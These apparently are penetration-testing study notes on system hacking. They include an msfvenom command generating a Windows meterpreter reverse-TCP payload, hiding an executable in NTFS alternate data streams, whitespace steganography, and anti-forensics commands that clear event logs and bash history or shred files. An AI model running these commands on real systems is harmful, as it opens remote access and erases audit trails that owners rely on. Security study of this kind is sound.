đĽď¸ System Hacking
System hacking is the process of gaining unauthorized access to a targetâs systems and applications.
Gaining access
Section titled âGaining accessâGaining access is the process of exploiting vulnerabilities in a targetâs systems and applications to gain unauthorized access.
Metasploit
Section titled âMetasploitâMetasploit is a penetration testing framework that allows security professionals to find and exploit vulnerabilities in systems and applications.
# Generate a reverse tcp payload for Windowsmsfvenom -p windows/meterpreter/reverse_tcp --platform windows \ -a x86 -o file.exe LHOST=YOUR_IP LPORT=YOUR_PORTExploit sites
Section titled âExploit sitesâExploit sites are repositories of information about known vulnerabilities in software and hardware.
Privilege escalation
Section titled âPrivilege escalationâPrivilege escalation is the process of gaining higher privileges on a targetâs system or application.
Post-exploitation
Section titled âPost-exploitationâPost-exploitation is the process of maintaining access to a targetâs system or application after gaining unauthorized access.
NTFS Alternate Data Streams
Section titled âNTFS Alternate Data StreamsâNTFS streams are a feature of the NTFS file system that allows files to contain multiple streams of data.
This can be used to hide data within a file without altering its size or appearance.
# Create a file with an alternate data streamecho "This is a hidden message" > file.txt:stream
# Insert a file as an alternate data streamtype exploit.exe > file.txt:file.exeWhite space stenography
Section titled âWhite space stenographyâWhite space stenography is the process of hiding data by using white space characters in a file.
snow -C -m "I am lying" -p "hello world" input.txt output.txtImage steganography
Section titled âImage steganographyâImage steganography is the process of hiding data within an image file.
Clear logs and data
Section titled âClear logs and dataâClear logs is the process of deleting or modifying logs on a targetâs system or application to cover tracks.
Windows
Section titled âWindowsâ# Clear logs using auditpol# https://learn.microsoft.com/it-it/windows-server/administration/windows-commands/auditpolauditpol /clear /y
# Clear logs using wevtutil# https://learn.microsoft.com/it-it/windows-server/administration/windows-commands/wevtutilwevtutil cl Systemwevtutil cl Application# ...
# Encrypt deleted data using cipher# https://learn.microsoft.com/it-it/windows-server/administration/windows-commands/ciphercipher /w:C:# Disable bash historyexport HISTSIZE=0
# Clear bash historyhistory -c # allhistory -w # current session
# Shred a file making it unrecoverableshred file.txt